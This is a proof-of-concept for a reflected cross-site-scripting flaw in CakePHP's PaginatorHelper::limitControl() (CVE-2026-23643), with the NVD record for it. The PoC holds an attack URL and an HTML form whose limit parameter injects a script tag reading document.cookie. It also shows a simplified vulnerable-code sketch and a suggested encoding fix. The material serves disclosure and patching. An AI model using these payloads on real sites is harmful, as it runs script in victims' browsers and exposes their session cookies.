CVE-2026-23643

<!-- CVE-2026-23643 PoC - XSS in CakePHP PaginatorHelper::limitControl() --> <!-- Attack URL ( victim's browser will execute malicious JS ) --> <!-- URL: http://target-website.com/controller/action?limit=10"><script>alert(document.cookie)</script> --> <!-- PoC HTML Form to demonstrate the vulnerability --> <form action="http://target-website.com/posts/index" method="GET"> <input type="hidden" name="limit" value="10\"><script>alert('XSS')</script>" /> <button type="submit">View Page with Malicious Limit</button> </form> <!-- Example of vulnerable URL generation --> <!-- Vulnerable code pattern in CakePHP PaginatorHelper: public function limitControl($limit = null, $maxLimit = null, $model = null) { // Vulnerable: directly outputs unsanitized parameter $passedArgs = $this->request->getQuery('limit'); // Should use htmlspecialchars($passedArgs, ENT_QUOTES, 'UTF-8') return $passedArgs; // XSS vulnerability here } --> <!-- Suggested fix (apply proper output encoding) --> <!-- $safeLimit = htmlspecialchars($passedArgs, ENT_QUOTES | ENT_HTML5, 'UTF-8'); return $safeLimit; -->

{"cve": {"id": "CVE-2026-23643", "sourceIdentifier": "[email protected]", "published": "2026-01-16T21:15:51.543", "lastModified": "2026-02-23T20:51:11.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CakePHP is a rapid development framework for PHP. The PaginatorHelper::limitControl() method has a cross-site-scripting vulnerability via query string parameter manipulation. This issue has been fixed in 5.2.12 and 5.3.1."}, {"lang": "es", "value": "CakePHP es un framework de desarrollo rápido para PHP. El método PaginatorHelper::limitControl() tiene una vulnerabilidad de cross-site-scripting a través de la manipulación de parámetros de cadena de consulta. Este problema ha sido solucionado en 5.2.12 y 5.3.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cakephp:cakephp:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2.10", "versionEndExcluding": "5.2.12", "matchCriteriaId": "DACDDE3A-55B3-43F0-A030-07372FDEC42B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:cakephp:cakephp:5.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "56DEA383-8A1A-47C5-B1B9-BB4FEF91024D"}]}]}], "references": [{"url": "https://bakery.cakephp.org/2026/01/14/cakephp_5212.html", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/cakephp/cakephp/commit/c842e7f45d85696e6527d8991dd72f525ced955f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/cakephp/cakephp/issues/19172", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/cakephp/cakephp/releases/tag/5.2.12", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/cakephp/cakephp/releases/tag/5.3.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/cakephp/cakephp/security/advisories/GHSA-qh8m-9qxx-53m5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}